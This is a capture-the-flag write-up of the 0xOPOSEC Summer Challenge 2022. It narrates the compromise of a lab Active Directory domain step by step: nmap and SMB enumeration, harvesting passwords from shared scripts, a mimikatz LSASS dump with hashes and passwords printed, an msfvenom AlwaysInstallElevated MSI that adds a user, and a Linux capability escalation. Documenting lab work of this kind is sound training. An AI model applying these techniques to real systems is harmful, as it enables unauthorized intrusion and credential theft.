0xOPOSEC Summer Challenge 2022

“Based in Porto, the 0xOPOSEC group was started by g33ks who are passionate about security. The meetup primary mission is to discuss and tackle upsurging security issues by leveraging the expertise and know-how of members of the group.”

First recon

Larapios Group Access

“Larapios Group states that they access to our core infrastructure! They claim that our security is lacking and have credentials to access our systems. Quickly, grab the access and gain access to one of the internal machines!”

First thing I did was to find all the up hosts and then find more info about those and for that I used nmap

$ nmap -sn 192.168.111.0/24

Nmap scan report for 192.168.111.26
Nmap scan report for 192.168.111.30
Nmap scan report for 192.168.111.31
Nmap scan report for 192.168.111.34
Nmap scan report for 192.168.111.36
Nmap scan report for 192.168.111.41
Nmap scan report for 192.168.111.42

$  nmap -O 192.168.111.0/24

Nmap scan report for 192.168.111.26
Host is up (0.035s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  	`
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.111.30
Host is up (0.050s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.111.31
Host is up (0.14s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap scan report for 192.168.111.34
Host is up (0.13s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap scan report for 192.168.111.36
Host is up (0.14s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.111.41
Host is up (0.049s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.111.42
Host is up (0.15s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Since this returned so much info I grouped everything by Windows and Linux machines by using the TTL when pinging and got the following

192.168.111.26:Windows
192.168.111.30:Windows
192.168.111.31:Linux
192.168.111.34:Linux
192.168.111.36:Windows
192.168.111.41:Windows
192.168.111.42:Windows

Grabing the first machine (Windows) I wanted to enumerate more and since this is most likely using Windows AD why not enumerate for LDAP? After enumerating I got the respective domain bajordas.local and the DC

$ sudo nmap -n -sV --script "ldap* and not brute" 192.168.111.26
ldapServiceName: bajordas.local:win-dc01$@BAJORDAS.LOCAL

Next thing I did was to enumerate all Windows machines for RDP since its a common service used by Windows and doing this got a lot more info like machine names and some juicy info

192.168.111.26
|   NetBIOS_Computer_Name: WIN-DC01
|   DNS_Computer_Name: WIN-DC01.bajordas.local

192.168.111.30
|   NetBIOS_Computer_Name: LAB-SHARE01
|   DNS_Computer_Name: LAB-SHARE01.bajordas.local

192.168.111.36
|   NetBIOS_Computer_Name: WIN-MGMT
|   DNS_Computer_Name: WIN-MGMT.bajordas.local

192.168.111.41
|   NetBIOS_Computer_Name: LAB-WIN6
|   DNS_Computer_Name: LAB-WIN6.bajordas.local

192.168.111.42
|   NetBIOS_Computer_Name: LAB-WIN7
|   DNS_Computer_Name: LAB-WIN7.bajordas.local

Next, but still in the enumeration process I enumerated smb and found powershell scripts on .30 machine

$ sudo nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-services.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse -p445 192.168.111.30

users1.ps1
provisionUsers.ps1

provisionUsers.ps1 had creds for sedalfino

net user sedalfino.freitas Summer2022 /add

users1.ps1 was a golden mine with more user creds

#new joiners
net user rogerio.marques Summer2022 /add /domain
net user rute.rodrigues Summer2022 /add /domain
net user rita.munoiz Summer2022 /add /domain
net user renato.recesso Summer2022 /add /domain
net user carolina.azevedo Summer2022 /add /domain
net user casemiro.silva Summer2022 /add /domain
net user jose.borges Summer2022 /add /domain
net user stefan.silva Summer2022 /add /domain
net user mary.christmas Summer2022 /add /domain
net user rodgers.john Summer2022 /add /domain

Knowing this I tried to authenticate anonymously on .30 to check those shares

$ smbclient --no-pass -L //192.168.111.30/

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Admins$         Disk
	Backups         Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Scripts         Disk
	Users           Disk

After this I tried to the creds I’ve found but only sedalfino.freitas were working but still I got the same privileges as anonymous

$ smbmap -u 'sedalfino.freitas' -p 'Summer2022' -d 'bajordas' -H 192.168.111.26

After some minutes (hours?) I decided to use xfreerdp and connect to any machine and I was able to do that on .41 but using remmina with sedalfino.freitas:Summer2022 and BAJORDAS.LOCAL creds

flag{oneSmallFootInTheEnterprise}

Second recon

Spread Your Hacks

“You got in? Noice!” “I heard they got a special machine for “Important People”, but they are not very security-focused and their automation is faulty. Can you access it?”

I already enumed a lot for the Windows machines so now I tried to jump to some Linux ones and used enum4linux for that
enum4linux gave me some creds

$ enum4linux -u "sedalfino.freitas" -p "Summer2022" -U 192.168.111.26`

index: 0x109a RID: 0x454 acb: 0x00000210 Account: big.boss Name: big boss Desc: Password: Money$$$ , make all managers the same password so I have access

Using big.boss:Money$$$ I was able to rdp to 192.168.111.41 and 192.168.42
On 192.168.111.42 I’ve found the flag

flag{slowMovingRabbit}

First Windows Priv Esc

Big Dollar Spender

“You in? Nice! Can you pwn it? Maybe…”

“They installed some shady service and hammered things down to make it work. Maybe it can be exploited in your favour”

While doing enumeration and research on 192.168.111.42 i noticed a strange file

winPEAS did a great job identifing the strange file permissions

After some hours of digging google and trying to understand how could I exploit this, I noticed that I could execute the file
Everytime I tried executing the file I had an error

Then I created a malicious .bat file that creates an user and gives permissions to that user but that didn’t work either
Next thing was to use PowerUp
With PowerUp executed I noticed a couple stuff i could do like abusing the service bajordas-svc with PowerUp

Abused the bajordas-svc and got a new user with Admin privileges

To sign-in as this user I used rdp and got the flag inside C:\Users\Administrator\Desktop

flag{GameOn!}

Third recon

Other Os Are People 2

“Larapios said there are some Linux machines loose in the environment and the System Administrator reuses their credentials 😩.”

“Can you access them?”

I jumped to 192.168.111.41 to try to find creds because they could be helpful to the future
First thing I did was to use mimikatz
For somereason I had touble using mimikatz to dump some creds, even with the latest version I wasn’t lucky

@darkcookie gave me an hint so I tried to dump the LSASS and then use the minidump to get stored credentials

After following the medium guide I got a creds for bacano.do.it and some other known accounts

PS C:\Users\brun0\Desktop> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::trust /patch

mimikatz # sekurlsa::minidump C:\Users\brun0\AppData\Local\Temp\lsass.DMP
Switch to MINIDUMP : 'C:\Users\brun0\AppData\Local\Temp\lsass.DMP'

mimikatz # sekurlsa::logonpasswords
Opening : 'C:\Users\brun0\AppData\Local\Temp\lsass.DMP' file for minidump...

User Name         : rogerio.marques
Domain            : BAJORDAS
Logon Server      : WIN-DC01
Logon Time        : 8/23/2022 10:11:40 PM
SID               : S-1-5-21-705575555-4224697876-3339875019-1121
        msv :
         [00000003] Primary
         * Username : rogerio.marques
         * Domain   : BAJORDAS
         * NTLM     : a3d7d25665f1146b56192b850fd57a93
         * SHA1     : 78936dac0d808daf0f58313fa74666ef26b41e40
         * DPAPI    : 6ccf347c45ff34bd7211b7d286a25d23
        kerberos :
         * Username : rogerio.marques
         * Domain   : BAJORDAS.LOCAL
         * Password : Summer2022

Authentication Id : 0 ; 440390 (00000000:0006b846)
Session           : RemoteInteractive from 3
User Name         : Administrator
Domain            : LAB-WIN6
Logon Server      : LAB-WIN6
Logon Time        : 8/22/2022 10:52:50 PM
SID               : S-1-5-21-4139696292-2348944387-3964195370-500
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
         [00000000]
         * Username : BAJORDAS\bacano.do.it
         * Domain   : BAJORDAS\bacano.do.it
         * Password : ViniVidiVici420!

Next thing I did was to login with ssh in 192.168.111.31 with bacano.do.it and I got the flag

flag{pinguinsRPeople2}

There was another challenge called Shells, Shells, Shells but I got the flag on this one too by using ssh in 192.168.111.34 with the same creds of bacano.do.it

flag{OneMore4TheRoad}

First Linux Priv Esc

CAPtain Pwn!

“The System Administrator was having trouble getting scripts to run but found a way to always work!”

“Can you abuse the misconfiguration and pwn the machine?”

Now was time to privesc the Linux box .31 so for that I ran linpeas
The output of linpeas gave me a cool finding about /usr/bin/python3.8 = cap_setuid+ep

As the blog post stated “As we know when the system creates a work context for each user where they achieve their tasks with the privileges that are assigned to them. So, to provide some specific functionalities, it is necessary for a non-privileged user to sometimes temporarily acquire a superuser profile to perform a specific task. This functionality mainly can be achieved by assigning privileges through sudo, or setuid permissions to an executable file which allows the user to adopt the role of the file owner. To accomplish the same task in a more secure way the system admin uses “capability” which plays an effective role in the security of Linux based operating systems.”
Knowing this It’s clear I can execute python (and that will have the setuid bit set) with root privileges, so It’s trivial to spawn a shell as root

flag{HelloCAPtain}

Second Linux Priv Esc

SO Cute!

“Infrastructure logs show a weird behaviour on one binary left in the server but we couldn’t discover how can we abuse it to render the server to its knees. Everything is patched so there will be a challenge.”

“Can you analyze the server and look for ways to overcome its security?”

The description is straight forward that I need to dig into the logs
So knowing this I started to search on linux logs (spent quite some time in this process)
Navigating to /usr/sbin I found an interesting binary

I searched for this binary on google and I found nothing so I assume that this was a crafted binary to this challenge
Running the binary gave me the following output

Unfortunately I was stuck for a long time on this challenge trying to break it without success so I wasn’t able to get the flag

Second Windows Priv Esc

Stairway To Heaven

“Larapios Group states that they can completely compromise the machine and gain Administrator access through a misconfiguration!”

So I moved to 192.168.111.41 and after some minutes of enumeration I decided to run winpeas
winpeas returned an interesting finding, alwaysinstalledelevated was set to 1 so I could exploit this with a crafted .msi file
I setuped a .msi file using msfvenom -p windows/adduser USER=brun0 PASS=n0tSoSecure! -f msi -o alwe.msi and then I uploaded that .msi file to 192.168.111.41
Then I executed the file from the windows box and then typed net user and found that brun0 was a valid user
Next I did a rdp connection with the new user created to the target machine and I was able to get the Administrator flag in C:\Users\Administrator\Desktop

flag{wholeLegInTheEnterprise}

Conclusion

This was my come back to 0XOPOSEC Summer Challenge (last I did was in 2019) and to be fair I realy liked It because It was more realistic as we could exploit linux machines and windows machines and jump from one to another. A recommendation for the next one would be to have a more defined path because there was an handful of achines and the challenges asked for a flag but we had to find what machine should we exploit to get the flag to that specific challenge. Other than that was a realy fun one so next is the Christmas challenge!